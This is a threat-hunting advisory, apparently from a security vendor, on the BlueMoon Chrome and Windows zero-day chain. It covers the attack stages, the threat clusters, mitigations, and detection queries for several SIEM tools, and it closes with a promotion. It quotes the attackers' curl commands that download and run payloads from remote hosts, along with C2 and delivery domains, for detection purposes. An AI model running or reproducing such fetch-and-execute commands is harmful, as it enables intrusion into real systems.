Hunt the Chrome-to-curl BlueMoon chain


The process tree still sitting on the box is not a closed Chrome patch ticket. It is chrome.exe (or msedge.exe / brave.exe) spawning cmd.exe, which spawns curl.exe, which writes %TEMP%\msgbox.exe or %TEMP%\ChromeUpdate.exe and runs it. Proofpoint tracks that default BlueMoon breakout, and the follow-on loaders are what operators actually keep. A hot stable build does not rewrite a curl stub that already ran from the broker.
This hunt shop is not a second CVSS recap, and it is not an exploit recipe. BlueMoon chains two Chromium V8 issues with a Windows ALPC local privilege escalation, then hands the operator a configurable command outside the renderer sandbox. Proofpoint first saw TA412 (JungleBamboo, Violet Typhoon) use it on 28 August 2026 against US NGOs, mining, and physical commodity trading firms. Within days, UNK_LateNight, UNK_DoubleCheck, and UNK_QuietRacket reused the same kit with different post-exploitation. BleepingComputer also notes Volexity UTA0560 / Grimwedge. Packaging varies; orchestration and loading stay the same. The huntable shape is the curl stub and cluster-specific persistence that follows.
How BlueMoon works in defender stages
Name the chain the way your triage already thinks: what each stage does and what it looks like in logs. Do not reconstruct V8 gadgets, JIT training, or ALPC primitives as a how-to.
Stage A. Browser foothold
Spearphish lands the target on an actor-controlled page. In early TA412 use, Proofpoint saw a brief loading page, then a redirect to a legitimate site. A Web Worker runs orchestration JavaScript, often as driver-html.js or a bundled launcher, and retries up to about five times. The sessionStorage key v8ctf_exp_attempt tracks attempts. Hunt drive-by worker JS, that key when collectable, and Emerging Threats SIDs 2071919 through 2071921 for BlueMoon JS loaders (2071922 through 2071924 for outbound beacons).
Stage B. V8 RCE and sandbox escape
CVE-2026-85046 is a TurboFan type confusion that yields renderer code execution. CVE-2026-87491 corrupts WebAssembly metadata for a V8 sandbox escape. The worker then loads three large Base64 blobs: Proofpoint labels p1, p2, and pp. Hunt unusual Chromium crashes paired with immediate follow-on process activity from the same session, not the JIT math.
Stage C. Host gate and LPE
Reflective DLL p1 fingerprints NT build, token integrity, and kernelbase.dll so the kit can decide whether to attempt elevation. Reflective DLL p2 runs the ALPC and WNF LPE CVE-2026-85880 only on older builds: 17763, 19041 through 19045, 20348, and 22000. Proofpoint notes a 2025 LPE DLL compilation timestamp and assesses the capability was likely repackaged into BlueMoon. Hunt renderer elevation and ALPC-shaped anomalies on those builds; treat them as LPE-eligible until patched.
Stage D. Broker breakout
Injector pp lands in the parent Chrome broker and runs CreateProcessA. The default command Proofpoint documents is:
curl -sS -o "%TEMP%\msgbox.exe" <exeUrl> && "%TEMP%\msgbox.exe"
When exeUrl is unset, it defaults relative to the current page. Operators can swap the command; UNK_DoubleCheck did exactly that into %APPDATA%. The primary tree remains Chromium parent to cmd to curl to msgbox.exe or ChromeUpdate.exe under %TEMP%. Treat every chrome-to-curl write into Temp as a lead until cleared. The noisy default is why BlueMoon is a strong hunt shop.
Patch-gap context in one beat: the CVE-2026-85046 fix landed upstream around 7 August 2026, while stable Chrome did not ship until about 3 September. Public Chromium diffs were available while stable users were still exposed, which is why multiple clusters showed up fast. Proofpoint notes development artifacts (markdown handover docs/v8-ctf-chrome-stage4-handover.md, verbose logs, "please send the full log back") consistent with AI-assisted work, and states that no single artifact conclusively confirms it.
Risk: what BlueMoon means for the company
Risk here is not a CVSS score on a ticket. It is browser fleet exposure: any Chromium user who clicks a spearphish link during the patch-gap window can hand the operator a curl-driven loader outside the renderer sandbox.
Proofpoint ties that path to cookie and session theft through GemStone, durable C2 such as ShadowPad and Cloudflare Workers or DoH beacons, and targeting across US aerospace, manufacturing, NGOs, mining, and commodity trading.
A hot Chrome build stops the next broker breakout. It does not remove a %TEMP% stub, a forged Gemini-named extension under Public\stomp_ext, or a scheduled task that already landed. If curl already ran from the broker, treat the host as compromised until the clean-bill checks clear.
Mitigate BlueMoon risk
Concrete controls from Proofpoint and the primary sources, not an exploit recipe.
Ship Chromium-family builds that include the CVE-2026-85046 and CVE-2026-87491 fixes, and prioritize Windows hosts still on builds 17763, 19041 through 19045, 20348, or 22000 for the CVE-2026-85880 ALPC patch. Constrain or alert on curl.exe spawned from chrome, msedge, brave, or vivaldi trees writing into %TEMP% or %APPDATA%.
Review scheduled tasks named EdgeCore_AutoUpdate, GeForceService, MicrosoftEdgeUpdatesTaskMachine, and Avpcheckup. Inspect C:\Users\Public\stomp_ext and any Gemini-named extensions installed outside the store, including forged Secure Preferences.
Review Emerging Threats SIDs 2071919 through 2071924 where present. Block Proofpoint-listed BlueMoon delivery and C2 domains when proxy or DNS controls allow. Rotate browser sessions and credentials if GemStone-like theft is confirmed.
What operators can do after the shell
Same EK, different post-compromise. Hunt the cluster you actually have.
TA412 / Violet Typhoon / JungleBamboo
First seen 28 August. Lures included internship outreach and AAS-in-Asia 2026 themes. Default msgbox.exe or ChromeUpdate.exe installs GemStone, a fake Google Gemini Chromium extension. It drops under C:\Users\Public\stomp_ext, kills Chrome, Edge, Brave, and Vivaldi, forges Secure Preferences HMAC and super_mac, then relaunches with --restore-last-session. Capabilities include cookies, storage, keystrokes, screenshots, and Cloudflare Workers C2 (/api/extensions/register, /ingest, /commands). Delivery domains Proofpoint cites include secboxes.com, msbenefit.com, and attcdn.com.
UNK_LateNight
From 2 September against US aerospace, with B2B and RFQ-themed mail. The post-exploitation msgbox.exe is a loader that drops a DLL sideload pair plus A08744D2.tmp, injects into targets such as wmpnetwk.exe, and creates a scheduled task, EdgeCore_AutoUpdate. The payload is ShadowPad, beaconing to ms.checrity.com (plus related checrity.com and Proofpoint IP 79.133.56.90).
UNK_DoubleCheck
Vietnam manufacturing, with mail from a compromised Southeast Asian government address. Proofpoint called this the only BlueMoon variant that obfuscated the JavaScript loader and config. Instead of default Temp msgbox:
cmd.exe /c curl.exe -k -o "%APPDATA%\Microsoft\Windows\#1" https://homepage.brianwilli.com/d/{wint.exe,calibre-launcher.dll,85rY.dat,SysPr.prx} && ...\wint.exe
That starts a Rust in-memory chain with an R2 bucket second stage and C2 on fracons.com. Persistence markers include tasks MicrosoftEdgeUpdatesTaskMachine and Avpcheckup, mutex Dataupcheckinfo, and CLSID {5D4CFCB7-222C-4CA3-96B6-1F8195FBBB4B}\InprocServer32.
UNK_QuietRacket
Indonesia and Singapore, with conference-themed lures. The pp injector downloads GeForce-named sideload pair GfExperienceService64.exe plus GFExperienceUpdate.dll. Persistence uses task GeForceService under C:\ProgramData\. C2 resolves over Google DoH TXT for dns.elixnovorem.com and dns.getaiexo.com into Cloudflare Workers. Hunt DoH TXT lookups and those binaries.
BleepingComputer also summarizes Volexity UTA0560 / Grimwedge NGO activity on the same kit family. Keep Proofpoint as the primary binding for hashes and domains below.
Clean-bill checklist
A quiet bill is more than "Chrome is current." Patching stops the next broker breakout. It does not erase GemStone under Public, a ShadowPad task, or an APPDATA Rust drop already on disk.
No chrome / msedge / brave to cmd to curl to %TEMP% msgbox.exe or ChromeUpdate.exe tree since late August
No v8ctf_exp_attempt in browser session artifacts when collectable
No C:\Users\Public\stomp_ext and no unknown Gemini-named extensions
No tasks EdgeCore_AutoUpdate, GeForceService, MicrosoftEdgeUpdatesTaskMachine, or Avpcheckup
Emerging Threats 2071919 through 2071924 reviewed when present
Hosts still on builds 17763, 1904x, 20348, or 22000 treated as LPE-eligible until patched
Anything short of that is still the Chrome-to-curl BlueMoon chain.
Hunt BlueMoon
Paste these. Bound to the Proofpoint artifacts above. Window starts at datetime(2026-08-28), matching the first observed TA412 use. Prefer process tree, file, scheduled task, and DNS over CVE version strings alone.
Hunt BlueMoon in KQL
Tree (chrome / msedge / brave to cmd to curl):
// Primary tree: Chromium -> cmd -> curl -> msgbox / ChromeUpdate in Temp
DeviceProcessEvents
| where Timestamp >= datetime(2026-08-28)
| where FileName =~ "curl.exe"
| where InitiatingProcessFileName in~ ("cmd.exe", "cmd")
| where InitiatingProcessParentFileName in~ ("chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe")
or InitiatingProcessCommandLine has_any ("msgbox.exe", "ChromeUpdate.exe", "%TEMP%", "\\Temp\\")
| where ProcessCommandLine has_any ("msgbox.exe", "ChromeUpdate.exe", "-o ", "-sS")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName,
InitiatingProcessCommandLine, InitiatingProcessParentFileName, AccountNameFiles and GemStone / sideload paths:
// Follow-on files and GemStone / sideload paths
DeviceFileEvents
| where Timestamp >= datetime(2026-08-28)
| where FileName in~ ("msgbox.exe", "ChromeUpdate.exe", "driver-html.js", "wint.exe",
"calibre-launcher.dll", "SysPr.prx", "85rY.dat", "A08744D2.tmp",
"GfExperienceService64.exe", "GFExperienceUpdate.dll")
or FolderPath has_any (@"\Users\Public\stomp_ext", @"\AppData\Roaming\Microsoft\Windows",
@"\ProgramData\GfExperience", @"\ProgramData\")
or FileName has "stomp_ext"
| project Timestamp, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName,
InitiatingProcessCommandLine, SHA256Tasks, mutex, and registry strings:
// Cluster persistence tasks and DoubleCheck registry / mutex strings
DeviceProcessEvents
| where Timestamp >= datetime(2026-08-28)
| where ProcessCommandLine has_any (
"EdgeCore_AutoUpdate", "GeForceService", "MicrosoftEdgeUpdatesTaskMachine", "Avpcheckup",
"Dataupcheckinfo", "5D4CFCB7-222C-4CA3-96B6-1F8195FBBB4B", "stomp_ext",
"--restore-last-session", "v8ctf_exp_attempt")
or FileName in~ ("schtasks.exe", "reg.exe")
and ProcessCommandLine has_any ("EdgeCore_AutoUpdate", "GeForceService",
"MicrosoftEdgeUpdatesTaskMachine", "Avpcheckup", "5D4CFCB7")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountNameDNS and network (Proofpoint delivery / C2):
// DNS / network for Proofpoint delivery and C2 hosts
DeviceNetworkEvents
| where Timestamp >= datetime(2026-08-28)
| where RemoteUrl has_any (
"secboxes.com", "msbenefit.com", "attcdn.com", "checrity.com", "ms.checrity.com",
"brianwilli.com", "fracons.com", "elixnovorem.com", "getaiexo.com", "velodynaity.com",
"joinmacket.com", "openlumakora.com")
or RemoteIP == "79.133.56.90"
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, RemotePort, InitiatingProcessFileName,
InitiatingProcessCommandLine, ProtocolHunt BlueMoon in Falcon CQL
Tree:
event_simpleName=ProcessRollup2
| timestamp>=#2026-08-28#
| (ImageFileName=*\\curl.exe*
AND (ParentBaseFileName=*cmd* OR GrandparentBaseFileName=*chrome*
OR GrandparentBaseFileName=*msedge* OR GrandparentBaseFileName=*brave*))
| (CommandLine=*msgbox.exe* OR CommandLine=*ChromeUpdate.exe* OR CommandLine=*-sS*
OR CommandLine=*\\Temp\\* OR CommandLine=*%TEMP%*)
| table timestamp, ComputerName, UserName, GrandparentBaseFileName, ParentBaseFileName,
ImageFileName, CommandLineFiles:
event_simpleName=FileWritten OR event_simpleName=NewExecutableWritten
| timestamp>=#2026-08-28#
| (FileName=*msgbox.exe* OR FileName=*ChromeUpdate.exe* OR FileName=*driver-html.js*
OR FileName=*wint.exe* OR FileName=*calibre-launcher.dll* OR FileName=*SysPr.prx*
OR FileName=*A08744D2.tmp* OR FileName=*GfExperienceService64.exe*
OR FileName=*GFExperienceUpdate.dll* OR FilePath=*stomp_ext*)
| table timestamp, ComputerName, UserName, ImageFileName, FileName, FilePathTasks:
event_simpleName=ProcessRollup2 OR event_simpleName=ScheduledTaskRegistered
| timestamp>=#2026-08-28#
| (CommandLine=*EdgeCore_AutoUpdate* OR CommandLine=*GeForceService*
OR CommandLine=*MicrosoftEdgeUpdatesTaskMachine* OR CommandLine=*Avpcheckup*
OR CommandLine=*Dataupcheckinfo* OR CommandLine=*5D4CFCB7-222C-4CA3-96B6-1F8195FBBB4B*
OR CommandLine=*stomp_ext* OR CommandLine=*--restore-last-session*
OR CommandLine=*v8ctf_exp_attempt*)
| table timestamp, ComputerName, UserName, ParentBaseFileName, ImageFileName, CommandLineDNS and network:
event_simpleName=DnsRequest OR event_simpleName=NetworkConnectIP4
| timestamp>=#2026-08-28#
| (DomainName=*secboxes.com* OR DomainName=*msbenefit.com* OR DomainName=*attcdn.com*
OR DomainName=*checrity.com* OR DomainName=*brianwilli.com* OR DomainName=*fracons.com*
OR DomainName=*elixnovorem.com* OR DomainName=*getaiexo.com* OR DomainName=*velodynaity.com*
OR RemoteAddressIP4=79.133.56.90)
| table timestamp, ComputerName, ImageFileName, DomainName, RemoteAddressIP4, RemotePortHunt BlueMoon in Splunk
earliest=08/28/2026:00:00:00
(index=crowdstrike OR index=sysmon OR index=windows OR index=edr OR index=proxy OR index=dns OR index=firewall)
(
(Image="*\\curl.exe" AND (ParentImage="*\\cmd.exe" OR ParentImage="*\\chrome.exe" OR ParentImage="*\\msedge.exe" OR ParentImage="*\\brave.exe")
AND (CommandLine="*msgbox.exe*" OR CommandLine="*ChromeUpdate.exe*" OR CommandLine="*-sS*" OR CommandLine="*%TEMP%*" OR CommandLine="*\\Temp\\*"))
OR (TargetFilename="*msgbox.exe" OR TargetFilename="*ChromeUpdate.exe" OR TargetFilename="*stomp_ext*"
OR TargetFilename="*wint.exe" OR TargetFilename="*GfExperienceService64.exe" OR TargetFilename="*A08744D2.tmp")
OR ("EdgeCore_AutoUpdate" OR "GeForceService" OR "MicrosoftEdgeUpdatesTaskMachine" OR "Avpcheckup"
OR "Dataupcheckinfo" OR "5D4CFCB7-222C-4CA3-96B6-1F8195FBBB4B" OR "v8ctf_exp_attempt" OR "--restore-last-session")
OR (query IN ("*secboxes.com*","*msbenefit.com*","*attcdn.com*","*checrity.com*","*brianwilli.com*","*fracons.com*","*elixnovorem.com*","*getaiexo.com*","*velodynaity.com*")
OR dest_ip="79.133.56.90" OR dest="79.133.56.90")
)Hunt BlueMoon in Kibana
@timestamp >= "2026-08-28" AND (
(process.name:("curl.exe") AND process.parent.name:("cmd.exe")
AND (process.parent.parent.name:("chrome.exe" OR "msedge.exe" OR "brave.exe")
OR process.command_line:(*msgbox.exe* OR *ChromeUpdate.exe* OR *-sS* OR *TEMP*)))
OR file.name:("msgbox.exe" OR "ChromeUpdate.exe" OR "driver-html.js" OR "wint.exe"
OR "calibre-launcher.dll" OR "SysPr.prx" OR "A08744D2.tmp"
OR "GfExperienceService64.exe" OR "GFExperienceUpdate.dll")
OR file.path:*stomp_ext*
OR message:("EdgeCore_AutoUpdate" OR "GeForceService" OR "MicrosoftEdgeUpdatesTaskMachine"
OR "Avpcheckup" OR "Dataupcheckinfo" OR "5D4CFCB7-222C-4CA3-96B6-1F8195FBBB4B"
OR "v8ctf_exp_attempt" OR "--restore-last-session")
OR dns.question.name:(*secboxes.com OR *msbenefit.com OR *attcdn.com OR *checrity.com
OR *brianwilli.com OR *fracons.com OR *elixnovorem.com OR *getaiexo.com OR *velodynaity.com)
OR destination.ip:"79.133.56.90"
)Sources
Proofpoint, Once in a BlueMoon: Multiple State-Aligned Threat Actors Rapidly Adopt Novel Exploit Chain Using Chrome and Windows Zero-Days, 9 September 2026. Primary lock for BlueMoon staging, chrome to cmd to curl to %TEMP%\msgbox.exe, driver-html.js / v8ctf_exp_attempt, patch-gap dates, soft AI-assisted wording, TA412 GemStone / stomp_ext, UNK_LateNight EdgeCore_AutoUpdate / ShadowPad, UNK_DoubleCheck APPDATA curl / fracons.com, UNK_QuietRacket GeForce sideload / DoH, ET 2071919-2071924, and hashes and domains in the hunts above.
BleepingComputer, New 'BlueMoon' kit exploited Windows and Chrome zero-day flaws, 10 September 2026. Secondary summary and Volexity UTA0560 / Grimwedge note.
SecurityWeek, BlueMoon Exploit Kit Chains Recent Chrome, Windows Zero-Days, 12 September 2026. Secondary timeline of cluster adoption and patch framing.
What This Means for Your Team
This case does not open on "patch Chrome and close the ticket." It opens when Chromium spawns cmd.exe that runs curl.exe into %TEMP%\msgbox.exe or ChromeUpdate.exe, when session artifacts show v8ctf_exp_attempt, or when follow-on loaders leave C:\Users\Public\stomp_ext, EdgeCore_AutoUpdate, GeForce sideload pairs, or APPDATA Rust chains. Proofpoint documents BlueMoon chaining CVE-2026-85046, CVE-2026-87491, and CVE-2026-85880 across TA412 GemStone, UNK_LateNight ShadowPad, UNK_DoubleCheck, and UNK_QuietRacket from 28 August 2026 onward. Stable Chrome catching up does not erase a curl stub that already ran from the broker. If your hunts only watch the browser version string, you will miss the Chrome-to-curl chain. Hunt those artifacts while late-August exposure is still in scope.
Inception Protection
Inception Protection is Inception Security's MDR on the Defender and Sentinel stack you already pay for. For BlueMoon, we hunt the chrome-to-curl tree into %TEMP%\msgbox.exe or ChromeUpdate.exe, Public\stomp_ext / GemStone-shaped extensions, tasks like EdgeCore_AutoUpdate and GeForceService, and Proofpoint delivery or C2 DNS, while you close the Chromium patch gap and treat older Windows builds as LPE-eligible until fixed.
Free Inception Foresight M365 Assessment
Want to see where your environment stands against BlueMoon traces like these, not just the Chrome build on the ticket? Grab our free Inception Foresight M365 Assessment. No strings. If this is useful, follow Inception Security on LinkedIn and @inceptionsec on X.



